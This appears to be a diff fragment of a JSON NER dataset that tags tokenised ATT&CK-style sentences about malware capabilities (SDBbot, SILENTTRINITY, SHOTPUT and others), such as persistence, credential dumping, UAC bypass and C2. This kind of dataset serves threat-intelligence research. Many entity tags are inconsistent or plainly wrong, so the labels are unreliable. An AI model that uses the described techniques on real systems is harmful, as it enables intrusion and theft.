+ "ports", + "443", + "or", + "8080", + "if", + "initial", + "communication", + "fails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "has", + "deleted", + "files", + "it", + "has", + "created", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "can", + "download", + "additional", + "files", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "has", + "run", + "the", + "command", + "`net", + "user`", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "may", + "create", + "a", + "temporary", + "user", + "on", + "the", + "system", + "named", + "`Lost_{Unique", + "Identifier}`", + "with", + "the", + "password", + "`pond~!@6”{Unique", + "Identifier}`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "may", + "save", + "itself", + "as", + "a", + "file", + "named", + "`msdtc.exe`,", + "which", + "is", + "also", + "the", + "name", + "of", + "the", + "legitimate", + "Microsoft", + "Distributed", + "Transaction", + "Coordinator", + "service", + "binary." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-Org", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "has", + "used", + "Windows", + "APIs,", + "including", + "`GetKeyboardType`,", + "`NetUserAdd`,", + "and", + "`NetUserDel`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "S-Type", + "may", + "create", + "a", + ".lnk", + "file", + "to", + "itself", + "that", + "is", + "saved", + "in", + "the", + "Start", + "menu", + "folder.", + "It", + "may", + "also", + "create", + "the", + "Registry", + "key", + "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "IMJPMIJ8.1{3", + "characters", + "of", + "Unique", + "Identifier}</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "may", + "create", + "the", + "file", + "<code>%HOMEPATH%\\Start", + "Menu\\Programs\\Startup\\Realtek", + "{Unique", + "Identifier}.lnk</code>,", + "which", + "points", + "to", + "the", + "malicious", + "`msdtc.exe`", + "file", + "already", + "created", + "in", + "the", + "`%CommonFiles%`", + "directory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "S-Type", + "samples", + "have", + "been", + "packed", + "with", + "UPX." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "S-Type", + "uses", + "Base64", + "encoding", + "for", + "C2", + "traffic." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "initial", + "beacon", + "packet", + "for", + "S-Type", + "contains", + "the", + "operating", + "system", + "version", + "and", + "file", + "system", + "of", + "the", + "victim." + ], + "ner_tags": [ + "O", + "O", + "I-Way", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "has", + "attempted", + "to", + "determine", + "if", + "a", + "compromised", + "system", + "was", + "using", + "a", + "Japanese", + "keyboard", + "via", + "the", + "`GetKeyboardType`", + "API", + "call." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "has", + "used", + "`ipconfig", + "/all`", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "has", + "run", + "tests", + "to", + "determine", + "the", + "privilege", + "level", + "of", + "the", + "compromised", + "user." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "runs", + "the", + "command", + "<code>net", + "start</code>", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "has", + "provided", + "the", + "ability", + "to", + "execute", + "shell", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "use", + "application", + "shimming", + "for", + "persistence", + "if", + "it", + "detects", + "it", + "is", + "running", + "as", + "admin", + "on", + "Windows", + "XP", + "or", + "7,", + "by", + "creating", + "a", + "shim", + "database", + "to", + "patch", + "services.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "access", + "the", + "file", + "system", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "decrypt", + "and", + "decompress", + "its", + "payload", + "to", + "enable", + "code", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "inject", + "a", + "downloaded", + "DLL", + "into", + "a", + "newly", + "created", + "rundll32.exe", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "sent", + "collected", + "data", + "from", + "a", + "compromised", + "host", + "to", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "delete", + "files", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "get", + "directory", + "listings", + "or", + "drive", + "information", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "use", + "image", + "file", + "execution", + "options", + "for", + "persistence", + "if", + "it", + "detects", + "it", + "is", + "running", + "with", + "admin", + "privileges", + "on", + "a", + "Windows", + "version", + "newer", + "than", + "Windows", + "7." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "clean", + "up", + "and", + "remove", + "data", + "structures", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "download", + "a", + "DLL", + "from", + "C2", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "communicate", + "with", + "C2", + "with", + "TCP", + "over", + "port", + "443." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "XOR", + "the", + "strings", + "for", + "its", + "installer", + "component", + "with", + "a", + "hardcoded", + "128", + "byte", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "can", + "enumerate", + "a", + "list", + "of", + "running", + "processes", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "use", + "port", + "forwarding", + "to", + "establish", + "a", + "proxy", + "between", + "a", + "target", + "host", + "and", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "add", + "a", + "value", + "to", + "the", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence", + "if", + "it", + "detects", + "it", + "is", + "running", + "with", + "regular", + "user", + "privilege." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "use", + "RDP", + "to", + "connect", + "to", + "victim's", + "machines." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "used", + "rundll32.exe", + "to", + "execute", + "DLLs." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "used", + "a", + "packed", + "installer", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "identify", + "the", + "OS", + "version,", + "OS", + "bit", + "information", + "and", + "computer", + "name." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "can", + "collected", + "the", + "country", + "code", + "of", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "determine", + "the", + "domain", + "name", + "and", + "whether", + "a", + "proxy", + "is", + "configured", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "identify", + "the", + "user", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "record", + "video", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDBbot", + "has", + "the", + "ability", + "to", + "use", + "the", + "command", + "shell", + "to", + "execute", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDelete", + "deletes", + "data", + "in", + "a", + "way", + "that", + "makes", + "it", + "unrecoverable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SDelete", + "deletes", + "data", + "in", + "a", + "way", + "that", + "makes", + "it", + "unrecoverable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SEASHARPEE", + "can", + "download", + "remote", + "files", + "onto", + "victims." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "SEASHARPEE", + "can", + "timestomp", + "files", + "on", + "victims", + "using", + "a", + "Web", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "SEASHARPEE", + "is", + "a", + "Web", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "SEASHARPEE", + "can", + "execute", + "commands", + "on", + "victims." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHARPSTATS", + "has", + "used", + "base64", + "encoding", + "and", + "XOR", + "to", + "obfuscate", + "PowerShell", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "SHARPSTATS", + "has", + "the", + "ability", + "to", + "upload", + "and", + "download", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SHARPSTATS", + "has", + "the", + "ability", + "to", + "employ", + "a", + "custom", + "PowerShell", + "script." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "SHARPSTATS", + "has", + "the", + "ability", + "to", + "identify", + "the", + "IP", + "address,", + "machine", + "name,", + "and", + "OS", + "of", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHARPSTATS", + "has", + "the", + "ability", + "to", + "identify", + "the", + "domain", + "of", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHARPSTATS", + "has", + "the", + "ability", + "to", + "identify", + "the", + "username", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHARPSTATS", + "has", + "the", + "ability", + "to", + "identify", + "the", + "current", + "date", + "and", + "time", + "on", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHIPSHAPE", + "achieves", + "persistence", + "by", + "creating", + "a", + "shortcut", + "in", + "the", + "Startup", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT30", + "may", + "have", + "used", + "the", + "SHIPSHAPE", + "malware", + "to", + "move", + "onto", + "air-gapped", + "networks.", + "SHIPSHAPE", + "targets", + "removable", + "drives", + "to", + "spread", + "to", + "other", + "systems", + "by", + "modifying", + "the", + "drive", + "to", + "use", + "Autorun", + "to", + "execute", + "or", + "by", + "hiding", + "legitimate", + "document", + "files", + "and", + "copying", + "an", + "executable", + "to", + "the", + "folder", + "with", + "the", + "same", + "name", + "as", + "the", + "legitimate", + "document." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHIPSHAPE", + "achieves", + "persistence", + "by", + "creating", + "a", + "shortcut", + "in", + "the", + "Startup", + "folder." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHOTPUT", + "has", + "a", + "command", + "to", + "obtain", + "a", + "directory", + "listing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SHOTPUT", + "has", + "a", + "command", + "to", + "retrieve", + "information", + "about", + "connected", + "users." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHOTPUT", + "is", + "obscured", + "using", + "XOR", + "encoding", + "and", + "appended", + "to", + "a", + "valid", + "GIF", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHOTPUT", + "has", + "a", + "command", + "to", + "obtain", + "a", + "process", + "listing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHOTPUT", + "has", + "a", + "command", + "to", + "list", + "all", + "servers", + "in", + "the", + "domain,", + "as", + "well", + "as", + "one", + "to", + "locate", + "domain", + "controllers", + "on", + "a", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHOTPUT", + "uses", + "netstat", + "to", + "list", + "TCP", + "connection", + "status." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHUTTERSPEED", + "can", + "download", + "and", + "execute", + "an", + "arbitary", + "executable." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SHUTTERSPEED", + "can", + "capture", + "screenshots." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SHUTTERSPEED", + "can", + "collect", + "system", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "enumerate", + "the", + "active", + "Window", + "during", + "keylogging", + "through", + "execution", + "of", + "`GetActiveWindowTitle`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "contains", + "a", + "number", + "of", + "modules", + "that", + "can", + "bypass", + "UAC,", + "including", + "through", + "Window's", + "Device", + "Manager,", + "Manage", + "Optional", + "Features,", + "and", + "an", + "image", + "hijack", + "on", + "the", + "`.msc`", + "file", + "extension." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "conduct", + "an", + "image", + "hijack", + "of", + "an", + "`.msc`", + "file", + "extension", + "as", + "part", + "of", + "its", + "UAC", + "bypass", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "add", + "a", + "CLSID", + "key", + "for", + "payload", + "execution", + "through", + "`Registry.CurrentUser.CreateSubKey(\"Software\\\\Classes\\\\CLSID\\\\{\"", + "+", + "clsid", + "+", + "\"}\\\\InProcServer32\")`." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "collect", + "clear", + "text", + "web", + "credentials", + "for", + "Internet", + "Explorer/Edge." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY's", + "`amsiPatch.py`", + "module", + "can", + "disable", + "Antimalware", + "Scan", + "Interface", + "(AMSI)", + "functions." + ], + "ner_tags": [ + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "use", + "`System`", + "namespace", + "methods", + "to", + "execute", + "lateral", + "movement", + "using", + "DCOM." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "use", + "`System.Security.AccessControl`", + "namespaces", + "to", + "retrieve", + "domain", + "user", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "use", + "`System.DirectoryServices`", + "namespace", + "to", + "retrieve", + "domain", + "group", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "transfer", + "files", + "from", + "an", + "infected", + "host", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "remove", + "files", + "from", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "has", + "several", + "modules,", + "such", + "as", + "`ls.py`,", + "`pwd.py`,", + "and", + "`recentFiles.py`,", + "to", + "enumerate", + "directories", + "and", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY's", + "`credphisher.py`", + "module", + "can", + "prompt", + "a", + "current", + "user", + "for", + "their", + "credentials." + ], + "ner_tags": [ + "B-Way", + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "has", + "a", + "module", + "that", + "can", + "extract", + "cached", + "GPP", + "passwords." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "has", + "the", + "ability", + "to", + "set", + "its", + "window", + "state", + "to", + "hidden." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "bypass", + "ScriptBlock", + "logging", + "to", + "execute", + "unmanaged", + "PowerShell", + "code", + "from", + "memory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "remove", + "artifacts", + "from", + "the", + "compromised", + "host,", + "including", + "created", + "Registry", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "load", + "additional", + "files", + "and", + "tools,", + "including", + "Mimikatz." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "contains", + "a", + "module", + "to", + "conduct", + "Kerberoasting." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "has", + "a", + "keylogging", + "capability." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "create", + "a", + "memory", + "dump", + "of", + "LSASS", + "via", + "the", + "`MiniDumpWriteDump", + "Win32`", + "API", + "call." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "obtain", + "a", + "list", + "of", + "local", + "groups", + "and", + "members." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "create", + "a", + "backdoor", + "in", + "KeePass", + "using", + "a", + "malicious", + "config", + "file", + "and", + "in", + "TortoiseSVN", + "using", + "a", + "registry", + "hook." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "modify", + "registry", + "keys,", + "including", + "to", + "enable", + "or", + "disable", + "Remote", + "Desktop", + "Protocol", + "(RDP)." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "has", + "the", + "ability", + "to", + "leverage", + "API", + "including", + "`GetProcAddress`", + "and", + "`LoadLibrary`." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "scan", + "for", + "open", + "ports", + "on", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" 